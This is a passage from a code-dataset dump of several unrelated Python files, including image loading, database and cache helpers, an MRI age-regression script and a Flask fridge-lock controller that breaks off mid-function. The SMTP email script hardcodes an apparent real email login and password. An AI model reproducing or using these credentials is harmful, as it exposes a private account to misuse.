if 'bodies' in r:\n suffix = f'_{r.split(os.sep)[-1]}'\n else:\n suffix = ''\n\n for file in f:\n if '.png' in file:\n try:\n image = pygame.image.load(os.path.join(r, file))\n image = image.convert_alpha()\n name = file.replace('.png', '') + suffix\n self.images[name] = image\n\n image = image.copy()\n image.fill((0, 0, 0), special_flags=pygame.BLEND_MULT)\n image.fill(SHADOW_COLOR, special_flags=pygame.BLEND_MAX)\n self.images[f'shadow_{name}'] = image\n except pygame.error as message:\n raise SystemExit(message)\n\n self.image_to_tiles('wall', 3, 1)\n self.image_to_tiles('wall_vertical', 1, 3)\n self.image_to_tiles('platform', 3, 1)\n\n def image_to_tiles(self, name, nx, ny):\n image = self.images[name]\n width, height = image.get_size()\n tile_width = width // nx\n tile_height = height // ny\n\n for i in range(nx):\n for j in range(ny):\n rect = pygame.Rect(i * tile_width, j * tile_height, tile_width, tile_height)\n tile = image.subsurface(rect)\n self.images[f'{name}_{i}_{j}'] = image.subsurface(rect)\n\n tile = tile.copy()\n tile.fill((0, 0, 0), special_flags=pygame.BLEND_MULT)\n tile.fill(SHADOW_COLOR, special_flags=pygame.BLEND_MAX)\n self.images[f'shadow_{name}_{i}_{j}'] = tile\n","sub_path":"imagehandler.py","file_name":"imagehandler.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"96114809","text":"# 普通设置\nfrom email.mime.text import MIMEText\nimport smtplib\n\n# 1参: 邮件正文 2参: subtype,plan代表的是纯文本 3参:编码格式\nmsg = MIMEText('hello,from Gt futures...','plan','utf-8')\n# 打印后会发现正文数据是加密的\n# print(msg)\n# 将数据转换成字符串格式\n# print(msg.as_string())\n\n# 发送者帐号密码与接受者帐号\nfrom_addr = '17635035787@163.com'\npwd = 'dxyna.'\nto_addr = 'se_cure@foxmail.com'\n# smtp服务器地址,指的是代发的服务器地址。就是邮箱的服务器地址\nsmtp_server = 'smtp.163.com' # 网易163 的SMTP服务器地址\n\nserver = smtplib.SMTP(smtp_server,25) # 默认无ssl的端口为25\n\nserver.set_debuglevel(1) # 可以打印出和SMTP服务器交互的信息\nserver.login(from_addr,pwd) # 登录STMP服务器\nserver.sendmail(from_addr,to_addr,msg.as_string()) # 发送: 发送者,接受者,正文\nserver.quit() # 关闭\n\n# ====================失败554 DT:SPM===========================\n\n","sub_path":"WorksZhang/Gt_0717/smtp邮件/lx_邮件1.py","file_name":"lx_邮件1.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"503070459","text":"import psycopg2\nimport config\nimport sys\n\nclass dbConnection:\n \n def connect(self):\n try:\n self._connect = psycopg2.connect(\n database = self._database,\n host = self._host,\n user = self._user,\n password = self._password,\n sslmode = \"disable\")\n return True\n except:\n return False\n\n def __init__(self, params, log): \n self.log = log\n\n if not params:\n self.log.exception(\"No database found.\")\n raise Exception (\"No database found.\")\n\n self._database = params['database']\n self._host = params['host']\n self._user = params['user']\n self._password = params['password']\n\n self._connect = None\n\n if not self.connect():\n self.log.exception(\"Database connection error.\")\n raise Exception (\"Database connection error.\")\n\n\n def query(self, sql, values=None):\n\n # Open up cursor\n try:\n cur = self._connect.cursor()\n except:\n self.connect()\n cur = self._connect.cursor()\n\n q = r = f = None\n\n if values is not None:\n try:\n r = cur.execute(sql,values)\n except:\n self.log.exception(\"Unable to execute sql command, aborted!\")\n sys.exit(1)\n else:\n try:\n r = cur.execute(sql)\n except:\n self.log.exception(\"Unable to execute sql command, aborted!\")\n sys.exit(1)\n\n q = cur.query\n try:\n f = cur.fetchone()\n except:\n f = None\n\n self.log.debug(\"Queried database with:\\n%s\" % q)\n \n self._connect.commit()\n self._connect.cursor().close()\n\n return f\n \n","sub_path":"reminders/dbconnection.py","file_name":"dbconnection.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"57323798","text":"\"\"\"This file defines a cache for linting results.\"\"\"\nimport os\n\nimport datetime\nimport hashlib\nimport pathlib\nimport sqlalchemy as sql\nimport typing\nfrom absl import flags\nfrom absl import logging\nfrom phd.lib.labm8 import shell\nfrom sqlalchemy import Binary\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import UniqueConstraint\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects import mysql\nfrom sqlalchemy.ext import declarative\n\nfrom util.photolib import common\nfrom util.photolib import linters\n\n\nFLAGS = flags.FLAGS\n\nBase = declarative.declarative_base() # pylint: disable=invalid-name\n\n# Global state for the keywords cache database is initialized by\n# a call to InitializeErrorsCache().\nENGINE = None\nMAKE_SESSION = None\nSESSION = None\n\n\nclass Meta(Base):\n __tablename__ = \"meta\"\n\n key: str = Column(String(1024), primary_key=True)\n value: str = Column(String(1024))\n\n\nclass Directory(Base):\n \"\"\"Directory cache entry.\"\"\"\n __tablename__ = \"directories\"\n\n relpath_md5: str = Column(Binary(16), primary_key=True)\n checksum: bytes = Column(\n sql.Binary(16).with_variant(mysql.BINARY(16), 'mysql'), nullable=False)\n date_added: datetime.datetime = Column(\n DateTime, nullable=False, default=datetime.datetime.utcnow)\n\n def __repr__(self):\n return (f'{self.relpath}: '\n f'{shell.ShellEscapeCodes.YELLOW}{self.message}'\n f'{shell.ShellEscapeCodes.END} [{self.category}]')\n\n\nclass CachedError(Base):\n \"\"\"Cached linter error.\"\"\"\n __tablename__ = \"errors\"\n\n id: int = Column(Integer, primary_key=True)\n dir: str = Column(Binary(16), ForeignKey(\"directories.relpath_md5\"),\n nullable=False)\n relpath: str = Column(String(1024), nullable=False)\n category: str = Column(String(512), nullable=False)\n message: str = Column(String(512), nullable=False)\n fix_it: str = Column(String(512), nullable=False)\n\n directory: Directory = orm.relationship(\"Directory\")\n\n __table_args__ = (UniqueConstraint(\n 'dir', 'relpath', 'category', 'message', 'fix_it', name='unique_error'),)\n\n def __repr__(self):\n return (f'{self.relpath}: '\n f'{shell.ShellEscapeCodes.YELLOW}{self.message}'\n f'{shell.ShellEscapeCodes.END} [{self.category}]')\n\n\ndef InitializeErrorsCache(workspace_abspath: str) -> None:\n \"\"\"\n Initialize the keywords cache database.\n\n Args:\n workspace_abspath: The absolute path to the workspace root.\n \"\"\"\n global ENGINE\n global MAKE_SESSION\n global SESSION\n\n if ENGINE:\n raise ValueError(\"InitializeErrorsCache() already called.\")\n\n cache_dir = os.path.join(workspace_abspath, \".cache\")\n os.makedirs(cache_dir, exist_ok=True)\n path = os.path.join(cache_dir, \"errors.db\")\n uri = f\"sqlite:///{path}\"\n logging.debug(\"Errors cache %s\", uri)\n\n ENGINE = sql.create_engine(uri, encoding=\"utf-8\")\n Base.metadata.create_all(ENGINE)\n Base.metadata.bind = ENGINE\n MAKE_SESSION = orm.sessionmaker(bind=ENGINE)\n SESSION = MAKE_SESSION()\n RefreshLintersVersion()\n\n\ndef RefreshLintersVersion():\n \"\"\"Check that \"\"\"\n meta_key = \"linters.py md5\"\n\n cached_linters_version = SESSION.query(Meta) \\\n .filter(Meta.key == meta_key) \\\n .first()\n cached_checksum = (cached_linters_version.value\n if cached_linters_version else \"\")\n\n with open(linters.__file__) as f:\n actual_linters_version = Meta(\n key=meta_key, value=common.Md5String(f.read()).hexdigest())\n\n if cached_checksum != actual_linters_version.value:\n logging.debug(\"linters.py has changed, emptying cache ...\")\n SESSION.query(Directory).delete()\n SESSION.query(CachedError).delete()\n if cached_linters_version:\n SESSION.delete(cached_linters_version)\n SESSION.add(actual_linters_version)\n SESSION.commit()\n\n\nclass CacheLookupResult(object):\n \"\"\"Contains results of a cache lookup.\"\"\"\n\n def __init__(self, exists: bool, checksum: bytes, relpath: str,\n relpath_md5: str, errors: typing.List[CachedError]):\n self.exists = exists\n self.checksum = checksum\n self.relpath = relpath\n self.relpath_md5 = relpath_md5\n self.errors = errors\n\n\ndef AddLinterErrors(entry: CacheLookupResult,\n errors: typing.List[str]) -> None:\n \"\"\"Record linter errors in the cache.\"\"\"\n # Create a directory cache entry.\n directory = Directory(relpath_md5=entry.relpath_md5, checksum=entry.checksum)\n SESSION.add(directory)\n\n # Create entries for the errors.\n errors_ = [CachedError(\n dir=directory.relpath_md5,\n relpath=e.relpath,\n category=e.category,\n message=e.message,\n fix_it=e.fix_it or \"\"\n ) for e in errors]\n if errors_:\n SESSION.bulk_save_objects(errors_)\n SESSION.commit()\n logging.debug(\"cached directory %s\", entry.relpath)\n\n\ndef GetDirectoryMTime(abspath) -> int:\n \"\"\"Get the timestamp of the most recently modified file/dir in directory.\n\n Params:\n abspath: The absolute path to the directory.\n\n Returns:\n The seconds since epoch of the last modification. If the directory is\n empty, zero is returned.\n \"\"\"\n paths = [os.path.join(abspath, filename) for filename in os.listdir(abspath)]\n if paths:\n return int(max(os.path.getmtime(path) for path in paths))\n else:\n return 0\n\n\ndef GetDirectoryChecksum(abspath: pathlib.Path) -> str:\n \"\"\"Compute a checksum to determine the contents and status of the directory.\n\n The checksum is computed\n\n Params:\n abspath:\n :return:\n \"\"\"\n hash = hashlib.md5()\n paths = [os.path.join(abspath, filename) for filename in os.listdir(abspath)]\n if paths:\n directory_mtime = int(max(os.path.getmtime(path) for path in paths))\n hash.update(str(directory_mtime).encode('utf-8'))\n for path in paths:\n if os.path.isfile(path):\n hash.update(str(path).encode('utf-8'))\n return hash\n\n\ndef GetLinterErrors(abspath: str, relpath: str) -> CacheLookupResult:\n \"\"\"Looks up the given directory and returns cached results (if any).\"\"\"\n relpath_md5 = common.Md5String(relpath).digest()\n\n # Get the time of the most-recently modified file in the directory.\n checksum = GetDirectoryChecksum(abspath).digest()\n\n ret = CacheLookupResult(\n exists=False,\n checksum=checksum,\n relpath=relpath,\n relpath_md5=relpath_md5,\n errors=[]\n )\n\n directory = SESSION \\\n .query(Directory) \\\n .filter(Directory.relpath_md5 == ret.relpath_md5) \\\n .first()\n\n if directory and directory.checksum == ret.checksum:\n ret.exists = True\n ret.errors = SESSION \\\n .query(CachedError) \\\n .filter(CachedError.dir == ret.relpath_md5)\n logging.debug(\"cache hit %s\", relpath)\n elif directory:\n logging.debug(\"removing stale directory cache %s\", relpath)\n\n # Delete all existing cache entries.\n SESSION.delete(directory)\n SESSION \\\n .query(CachedError) \\\n .filter(CachedError.dir == ret.relpath_md5) \\\n .delete()\n\n return ret\n","sub_path":"util/photolib/lintercache.py","file_name":"lintercache.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"358932566","text":"#%% IMPORTATION oF THE NECESSARY LIBRARIES:\r\n\r\nimport numpy as np\r\nimport nibabel as nib\r\nimport importlib\r\n\r\nimport sys\r\nsys.path.append('../src')\r\nimport imageAnalysis as ia\r\nimport MachineLearningAlgorithms as ml\r\n#import matplotlib.pyplot as plt\r\n\r\n# Path of your repositery where you should put the training and the test \r\n# dataset\r\npath = \"./data/\"\r\n\r\nprint(\"\\nLibraries imported\")\r\n\r\n\r\n#%% RELOADING OF THE MODIFIED LIBRARIES:\r\n \r\nia = importlib.reload(ia)\r\nml = importlib.reload(ml)\r\n\r\nprint(\"\\nLibraries reloaded\")\r\n\r\n\r\n#%% LOADING OF THE FUNCTIONS USED IN THE SCRIPT:\r\n \r\ndef loadData( path, strDataset, strName, nSamples ):\r\n \"\"\" To load the 3D MRI images of a dataset\r\n \r\n INPUTS:\r\n path -- string, path of your repositery\r\n strDataset -- string, name of the dataset folder\r\n strName -- string, common name of each file \r\n nSamples -- integer, number of elements you want to pick up in the \r\n dataset folder \r\n OUTPUTS:\r\n datasetDic -- dictionary, the index of the dictionary corresponds to\r\n the file index of the 3D MRI images. And the value of the dictionary\r\n is a 3D np.array cropped such that we do not take into account the \r\n parts of the 3D images containing only zeros. \r\n \"\"\"\r\n # Size of the image:\r\n xSize = 176\r\n ySize = 208\r\n zSize = 176\r\n\r\n # Limits of the regions of interest of the data:\r\n xLimMin = 14\r\n xLimMax = 18\r\n yLimMin = 12\r\n yLimMax = 15\r\n zLimMin = 3\r\n zLimMax = 20\r\n\r\n # Creation of the dictionary which will contain our dataset:\r\n datasetDic = {}\r\n\r\n for i in range(nSamples):\r\n # Complete path of the i-th file of the dataset:\r\n imageName = strName + str(i + 1)\r\n imagePath = path + \"/\" + strDataset + \"/\" + imageName + \".nii\"\r\n \r\n # Loading of the 3D images using a function from the nibabel library\r\n imageRaw = nib.load(imagePath)\r\n \r\n # Tranforming the images into data (3d np.array):\r\n datasetDic[i] = imageRaw.get_data()[xLimMin:xSize-xLimMax, \\\r\n yLimMin:ySize-yLimMax, zLimMin:zSize-zLimMax, 0]\r\n \r\n return datasetDic\r\n\r\n\r\ndef featuresExtraction(datasetDic, featureDic):\r\n \"\"\" To extract the relevant features from the input data\r\n \r\n INPUTS:\r\n datasetDic -- dictionary, it contains all the 3D MRI images from the \r\n dataset\r\n featureDic -- dictionary, the key of the dictionary is the name of the \r\n function (string) that we want to use to extract the features we wish. \r\n The value contains the inputs variables of the functions used to \r\n compute the features. it can can be either a dictionary: \r\n {\"input1\": value1,..., \"inputN\": valueN} or a number. If it is a number \r\n it will be interpreted as the polynomial order on which we want to fit \r\n the given features \r\n OUTPUTS:\r\n featureMatrix -- dictionary, the index of the dictionary corresponds to\r\n the file index of the 3D MRI images. And the value of the dictionary\r\n is a 1D np.array containing all the computed features. \r\n \r\n \"\"\"\r\n \r\n # We create an object of the class Features from the dataset dictionary:\r\n dataSet = ml.Features(datasetDic)\r\n \r\n # Use of the function featureExtraction (from the MachineLearningAlgorithms\r\n # module) to extract the features selected in the dictionary featureDic: \r\n featureMatrix = dataSet.featureExtraction(**featureDic)\r\n\r\n # Number of features:\r\n nFeatures = featureMatrix.shape[1]\r\n print(\"\\nThe features matrix is computed. There are {} different features\".format(nFeatures))\r\n \r\n return featureMatrix\r\n\r\nprint(\"\\nFunctions loaded\")\r\n\r\n\r\n#%% LOADING OF THE LABELS OF THE TRAINING DATASET:\r\n\r\n# File name where is the labels of the training dataset:\r\nstrLabel = \"targets.csv\"\r\n\r\n# Loading of the labels of the training dataset:\r\nlabel = np.genfromtxt(path+strLabel, delimiter=',').astype(int)\r\n\r\n# Number of labeled patients, i.e number of 3D MRI images:\r\nnSamples = label.size\r\n \r\nprint(\"\\nLabels loaded. There are \" + str(nSamples) + \" samples in the dataset\")\r\n\r\n\r\n#%% LOADING OF THE LABELED DATASET:\r\n\r\n# Name of the training dataset folder\r\nstrDataset = \"set_train\"\r\n\r\n# Common name of each file of the training dataset folder\r\nstrName = \"train_\"\r\n\r\n# Loading of the images from the training dataset and saving in a dictionary:\r\ndatasetDic = loadData( path, strDataset, strName, nSamples )\r\n\r\nprint(\"\\nThe dataset dictionary containing all the 3D images of the labeled \\\r\ndataset has been created\") \r\n\r\n\r\n#%% FEATURES EXTRACTION:\r\n \r\nml = importlib.reload(ml)\r\n\r\n# We create a dictionary containing the features we want. It should respect \r\n# the following construction rules:\r\n# 1) The key is the name of the function (string) that we want to use \r\n# to extract the features we wish. \r\n# 2) The value represents the parameters of the used function knowing\r\n# that:\r\n# - the parameters can be either a dictionary: {\"input1\": value1,\r\n# ..., \"inputN\": valueN} or a number. If it is a number it will \r\n# be interpreted as the polynomial order on which we want to fit \r\n# the given feature\r\nfeatureDic = {}\r\n\r\n# Feature dictionary used for obtaining our best score:\r\nfeatureDic[\"gridOperation\"] = { \"nGrid\":(15,15,15), \"npoly\":1, \\\r\n \"typeOp\":[\"mean\",\"var\"]}\r\n \r\n# Extraction of the features we want from the training dataset:\r\nfeatureMatrix = featuresExtraction( datasetDic, featureDic)\r\n\r\n\r\n#%% CROSS VALIDATION PREDICTION AND SCORES:\r\n \r\nml = importlib.reload(ml)\r\n\r\n# We create an object of the class Prediction to be able to use the functions\r\n# of this class in particular for predicting the data:\r\ndata2Predict = ml.Prediction(featureMatrix, label) \r\n\r\n# We use cross validation to check the accuracy (mean-squared error) of the \r\n# chosen features and regularizer parameter (in Ridge or Lasso):\r\n#MSECV = data2Predict.crossValidation(nFold=10, typeCV=\"random\")\r\n\r\n#print(\"After cross-validation, we obtain a score of {}\".format(MSECV)) \r\n\r\n\r\n#%% COMPUTATION OF THE MODEL PARAMETERS ON THE WHOLE LABELED DATASET:\r\n \r\n# After having checked the accuracy of our feature selection and linear \r\n# regression method, the parameters of our model are determined over the \r\n# whole training dataset: \r\nmodelParameters = data2Predict.buildClassifier(featureMatrix, \\\r\n label, method = \"RidgeCV\")\r\n\r\n# Prediction of the data using the model parameters:\r\n_, MSESelf = data2Predict.predict(modelParameters, featureMatrix,\\\r\n labelValidation = label) \r\n\r\nprint(\"Our model tested on the data used for training gives a score of {}\".format(round((MSESelf),3))) \r\n\r\n\r\n#%% LOADING OF THE NON-LABELED DATASET: \r\n \r\nml = importlib.reload(ml)\r\n\r\n# Name of the test dataset folder\r\nstrDataset = \"set_test\"\r\n\r\n# Common name of each file of the test dataset folder\r\nstrName = \"test_\"\r\n\r\n# Loading of the images from the test dataset and saving in a dictionary:\r\ndatasetTestDic = loadData( path, strDataset, strName, 138 )\r\n\r\nprint(\"\\nThe dataset dictionary containing all the 3D images of the test \\\r\n dataset has been created\") \r\n\r\n# Extraction of the features of the test dataset:\r\nfeatureMatrixTest = featuresExtraction(datasetTestDic, featureDic)\r\n\r\n\r\n#%% PREDICTION FOR THE NON-LABELED DATASET:\r\n\r\nml = importlib.reload(ml)\r\n \r\n# We create an object of the class Prediction from the test dataset dictionary: \r\nunlabeledData= ml.Prediction(featureMatrixTest)\r\n\r\n# The labels of the test data set are predicted using the parameters of our \r\n#model:\r\ntestPrediction = unlabeledData.predict(modelParameters, featureMatrixTest)\r\n\r\n## Plot the predicted data and the true data:\r\n#plt.figure(102)\r\n#\r\n# # X-axis:\r\n#x = np.linspace(1, 138, 138)\r\n# \r\n## Plot of the predicted labels:\r\n#plt.plot(x, testPrediction, color=\"blue\", linewidth=1, \\\r\n# linestyle='--', marker='o')\r\n#plt.xlabel(\"Patient number\")\r\n#plt.ylabel(\"Age\")\r\n\r\nprint(\"\\n The prediction for the non-labeled dataset\") \r\n\r\n#%% WRITING OF THE PREDICTION INTO A .CSV FILE:\r\n\r\n# Name of the file which will contain our predictions for the test dataset:\r\nfileStr = 'newSubmission.csv'\r\n\r\nfileIO = open( path + fileStr,'w' )\r\nfileIO.write( 'ID,Prediction\\n' )\r\nanswer = np.rint(testPrediction).astype(int)\r\nfor i in range( len( testPrediction ) ):\r\n fileIO.write( str(i+1) + ',' + str(answer[i]).strip('[]') + '\\n' )\r\nfileIO.close()\r\n\r\nprint(\"\\n The prediction has been written in a .csv file\")","sub_path":"age-prediction/predict_final.py","file_name":"predict_final.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632104682","text":"#\n# @lc app=leetcode id=46 lang=python3\n#\n# [46] Permutations\n#\n\n# @lc code=start\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \n used = [0]*len(nums)\n res = []\n\n def dfs(used, cur):\n if len(cur) == len(nums):\n res.append(cur)\n return\n for i in range(len(nums)):\n if used[i]:\n continue\n used[i] = 1 \n dfs(used, cur + [nums[i]])\n used[i] = 0\n \n dfs(used, [])\n return res\n# time: O(n!*n) backtrack 调用次数O(n!). 我们需要将当前答案使用 O(n) 的时间复制到答案数组中\n# space: O(n)\n \n# @lc code=end\n\n","sub_path":"46.permutations.py","file_name":"46.permutations.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"409344368","text":"\"\"\"Extremes.\"\"\"\n# -*- coding: utf-8 -*-\n\n# standard\nfrom functools import total_ordering\nfrom typing import Any\n\n\n@total_ordering\nclass AbsMax:\n \"\"\"An object that is greater than any other object (except itself).\n\n Inspired by https://pypi.python.org/pypi/Extremes\n\n Examples::\n\n >>> import sys\n\n >>> AbsMax > AbsMin\n True\n\n >>> AbsMax > sys.maxint\n True\n\n >>> AbsMax > 99999999999999999\n True\n\n .. versionadded:: 0.2\n \"\"\"\n\n def __ge__(self, other: Any) -> bool:\n \"\"\"GreaterThanOrEqual.\"\"\"\n return other is not AbsMax\n\n\n@total_ordering\nclass AbsMin:\n \"\"\"An object that is less than any other object (except itself).\n\n Inspired by https://pypi.python.org/pypi/Extremes\n\n Examples::\n\n >>> import sys\n\n >>> AbsMin < -sys.maxint\n True\n\n >>> AbsMin < None\n True\n\n >>> AbsMin < ''\n True\n\n .. versionadded:: 0.2\n \"\"\"\n\n def __le__(self, other: Any) -> bool:\n \"\"\"LessThanOrEqual.\"\"\"\n return other is not AbsMin\n","sub_path":"validators/_extremes.py","file_name":"_extremes.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"70623012","text":"from storefront.models import Product, Category\n\ndef getCatTree(currentCat = None):\n\t\"\"\"\n\t\tcurrentCat - int or None\n\n\t\tNone: returns top level categories and one level of subcategories\n\t\t: like None but with tree of subcategories to passed category\n\t\"\"\"\n\ttop = [ currentCat ]\n\tif currentCat:\n\t\tcurCat = Category.objects.get(id = currentCat)\n\t\ttop = getTopId(curCat, top)\n\n\tcategories = Category.objects.all().filter(parent = None, enabled = True)\n\n\tdef getTreeToCat(subs):\n\t\tif len(top):\n\t\t\tnext = top.pop(0)\n\t\t\tfor s in subs:\n\t\t\t\tif s.id == next:\n\t\t\t\t\ts.subs = Category.objects.all().filter(parent = s.id, enabled = True)\n\t\t\t\t\tgetTreeToCat(s.subs)\n\n\t\treturn subs\n\n\tnext = None\n\tif len(top):\n\t\tnext = top.pop(0)\n\t\t\n\tfor c in categories:\n\t\tc.subs = Category.objects.all().filter(parent = c.id, enabled = True)\n\t\tif next and c.id == next:\n\t\t\tgetTreeToCat(c.subs)\n\n\t# for c in categories:\n\t# \tprint \"1%s\" % c.name\n\t# \tif hasattr(c, \"subs\"):\n\t# \t\tfor s in c.subs:\n\t# \t\t\tprint \"2\t%s\" % s.name\n\t# \t\t\tif hasattr(s, \"subs\"):\n\t# \t\t\t\tfor k in s.subs:\n\t# \t\t\t\t\tprint \"3\t\t%s\" % k.name\n\n\treturn categories\n\ndef getTopId(category, parent = []):\n\t\"\"\"\n\t\tcategory - int\n\n\t\tReturns id of the top parent of passed category\n\t\"\"\"\n\tif category.parent and category.parent.id is not None:\n\t\tparent.insert(0, category.parent.id)\n\t\treturn getTopId(category.parent, parent)\n\telse:\n\t\treturn parent","sub_path":"storefront/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593086756","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport glob\nimport json\nimport csv\nfrom scipy.io import loadmat\nfrom collections import defaultdict\n\nall_obj = 0\ndata = defaultdict(dict)\ndataList = []\ncount = 0\ncolumn_titles = ['Set Name', 'Video Name', 'nFrame', 'Frame ID', 'ID', 'Init', 'Label', 'Start', 'End', 'Hide', 'Pos', 'Occl', 'Lock', 'Posv']\n\ndataList.append(column_titles)\n\ndataCheck = [['this', 'that', 'other'], ['other', 'this', 'that']]\ncheck = False\nif (not check):\n for dname in sorted(glob.glob('data/annotations/set*')):\n set_name = os.path.basename(dname)\n #print(\"set name: \", set_name)\n\n data[set_name] = defaultdict(dict)\n for anno_fn in sorted(glob.glob('{}/*.vbb'.format(dname))):\n #print(\"anno_fn: \", anno_fn)\n vbb = loadmat(anno_fn)\n\n nFrame = int(vbb['A'][0][0][0][0][0])\n objLists = vbb['A'][0][0][1][0]\n maxObj = int(vbb['A'][0][0][2][0][0])\n objInit = vbb['A'][0][0][3][0]\n objLbl = [str(v[0]) for v in vbb['A'][0][0][4][0]]\n objStr = vbb['A'][0][0][5][0]\n objEnd = vbb['A'][0][0][6][0]\n objHide = vbb['A'][0][0][7][0]\n altered = int(vbb['A'][0][0][8][0][0])\n log = vbb['A'][0][0][9][0]\n logLen = int(vbb['A'][0][0][10][0][0])\n #print(\"vbb data: \", [nFrame, objHide, altered, log.tolist(), logLen])\n\n video_name = os.path.splitext(os.path.basename(anno_fn))[0]\n data[set_name][video_name]['nFrame'] = nFrame\n data[set_name][video_name]['maxObj'] = maxObj\n data[set_name][video_name]['log'] = log.tolist()\n data[set_name][video_name]['logLen'] = logLen\n data[set_name][video_name]['altered'] = altered\n data[set_name][video_name]['frames'] = defaultdict(list)\n\n n_obj = 0\n for frame_id, obj in enumerate(objLists):\n if len(obj) > 0:\n for id, pos, occl, lock, posv in zip(\n obj['id'][0], obj['pos'][0], obj['occl'][0],\n obj['lock'][0], obj['posv'][0]):\n keys = obj.dtype.names\n id = int(id[0][0]) - 1 # MATLAB is 1-origin\n pos = pos[0].tolist()\n occl = int(occl[0][0])\n lock = int(lock[0][0])\n posv = posv[0].tolist()\n\n obj_row = []\n\n datum = dict(zip(keys, [id, pos, occl, lock, posv]))\n datum['lbl'] = str(objLbl[datum['id']])\n datum['str'] = int(objStr[datum['id']])\n datum['end'] = int(objEnd[datum['id']])\n datum['hide'] = int(objHide[datum['id']])\n datum['init'] = int(objInit[datum['id']])\n\n init = int(objInit[datum['id']])\n lbl = str(objLbl[datum['id']])\n start = int(objStr[datum['id']])\n end = int(objEnd[datum['id']])\n hide = int(objHide[datum['id']])\n\n data[set_name][video_name][\n 'frames'][frame_id].append(datum)\n n_obj += 1\n\n obj_row.append(set_name)\n obj_row.append(video_name)\n obj_row.append(nFrame)\n obj_row.append(frame_id)\n obj_row.append(id)\n obj_row.append(init)\n obj_row.append(lbl)\n obj_row.append(start)\n obj_row.append(end)\n obj_row.append(hide)\n obj_row.append(pos)\n obj_row.append(occl)\n obj_row.append(lock)\n obj_row.append(posv)\n\n\n # print(obj_row)\n # if (count == 0):\n # break\n dataList.append(obj_row)\n # if (count == 0):\n # break\n #print(dname, anno_fn, n_obj)\n all_obj += n_obj\n #count+=1\n # if (count == 0):\n # break\n\n print('Number of objects:', all_obj)\n with open('data-annotations.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for item in dataList:\n writer.writerow(item)\n #json.dump(data, open('data-annotations.json', 'w'))\nelse:\n print('Number of objects:', all_obj)\n with open('data-annotations.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for item in dataCheck:\n writer.writerow(item)\n","sub_path":"scripts/convert_annotations.py","file_name":"convert_annotations.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333311679","text":"from flask import Flask, render_template, request, send_from_directory, session, jsonify\nfrom flask_session import Session\n# from gpiozero import Button,LED\n\n\n'''\nState-flow:\n\nstate0:\n door: closed\n magnet: on\n qr code: not recognized\n\n\n if qr-code recognized:\n state_fridge 1\n\nstate1:\n door closed\n magnet: off\n\n\n qr code: was recognized\n\n if door was opened:\n state_fridge 2\n\nstate2:\n door: opened\n magnet: off\n qr code: ...\n\n if door is closed again:\n state_fridge 3\n\nState 3:\n door: closed\n magnet: on\n qr code: ...\n\n show bill\n\n'''\n\n\napp = Flask(__name__)\nsess = Session()\n\n# door_sensor = Button(18)\n# magnet = LED(23)\n\n#set the magnet off; remember the magnet works with inverted logic\n# magnet.on()\n\n@app.route('/get_state')\ndef get_state():\n dict_status = {}\n dict_status[\"session\"] = session[\"status_session\"]\n dict_status[\"magnet\"] = session[\"status_magnet\"]\n dict_status[\"door\"] = session[\"status_door\"]\n\n return(jsonify(dict_status))\n\n# fridge geschlossen, verriegelt\n\n# Endpunkt wird aufgerufen von Ajax-Call, wenn QR-Code seite angezeigt wird\n# wichtig, damit der fridge initialissiert wird\n@app.route('/set_state0')\ndef set_state0():\n session[\"status_session\"] = \"state0\"\n session[\"status_magnet\"] = \"on\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.on()\n\n return (str(session['status_session']) + \" set\")\n\n# qr-code wurde detected\n# fridge wird entsperrt, ist aber noch geschlossen\n# Endpunkt wird aufgerufen automatisch wenn QR-Code erkannt wurde\n@app.route('/set_state1')\ndef set_state1():\n session[\"status_session\"] = \"state1\"\n session[\"status_magnet\"] = \"off\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.off()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# fridge wurde geoeffnet\n@app.route('/set_state2')\ndef set_state2():\n session[\"status_session\"] = \"state2\"\n session[\"status_magnet\"] = \"off\"\n session[\"status_door\"] = \"open\"\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# fridge wurde geschlossen, bill soll angezeigt werden\n@app.route('/set_state3')\ndef set_state3():\n session[\"status_session\"] = \"state3\"\n session[\"status_magnet\"] = \"on\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.on()\n # bill_show()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# fuunktion wird regelmaessig aufgerufen.\n# Abhaengig vom tatsaechlichen status soll der status geupdatet werden\n@app.route('/update-state_fridge')\ndef control_update_fridge_state():\n session[\"status_door\"] = \"closed\"\n # door_sensor.value == 1 --> closed\n # door_sensor.value == 0 --> open\n # door_sensor.value\n #if 